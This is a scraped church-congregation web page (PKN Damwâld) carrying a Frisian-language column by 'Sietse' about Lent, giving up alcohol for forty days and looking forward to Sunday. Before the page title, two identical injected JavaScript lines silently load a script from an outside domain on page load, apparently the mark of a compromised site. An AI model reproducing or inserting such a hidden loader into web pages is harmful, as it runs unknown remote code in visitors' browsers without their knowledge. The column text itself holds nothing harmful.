;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Útsjen nei de snein …. - PKN Damwâld

Útsjen nei de snein ….

Gepubliceerd op: maandag 18 maart 2019

Nee dit giet net oer myn foarkar foar in dûmny op in bipaalde snein. Elk fan ús hat sa syn of har favoriet; sa kin de ien in thema goed delsette en útlizze, mar giet it mis yn de útfiering; wij sizze dan, it komt net oer. Somtiden kin de muziek of it sjongen jo wer op it goede spoar sette, likegoed kin ik soms yn sliep falle bij it tempo fan it sjongen. Mar dochs; útsjen nei de snein…..
Wij leve yn de 40- dagen tiid, de tiid fan bezinning op wei nei Peaske. Fanâlds in tradysje út de Roomske Tsjerke; As it feest dien is,it carnaval, begjint op Aswoensdag de tiid fan ûnthâlding, fan de bezinning. De iene smookt dan 40 dagen net,of snobbet net, de oare ûnthâld him of har fan al it lúkse iten, ja sels de seks is bij goun minsken dan even net oan de oarder! Myn frou bitocht sa dat wij it wol 40 dagen sûnder alcohol stelle koenen! No mei ik graag in slokje of in portsje dat ik wie net wyld enthousiast fansels, mar soms komt der ûnferwachts hulp; Ik krige de griep ûnder de lea en dan tinke jo net meer oan in slokje! Jim bigrype wol, ik wie om! Mar no komt de grutste meifaller; Ds Beekman skrean yn syn column yn de Ljouwerter Krante dat de snein net meitelde bij it féstjen; wat is it gefal; de tiid tusken aswoensdag en Peaske telt 46 dagen,mar de seis sneinen telle net mei yn de féstentiid. Wij féstje no dus 40 dagen, oftewol troch de wike gjin alcohol. Ik kin it jim oanriede! En de snein?  Ik sjoch der nei út!!!

Sietse

 

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns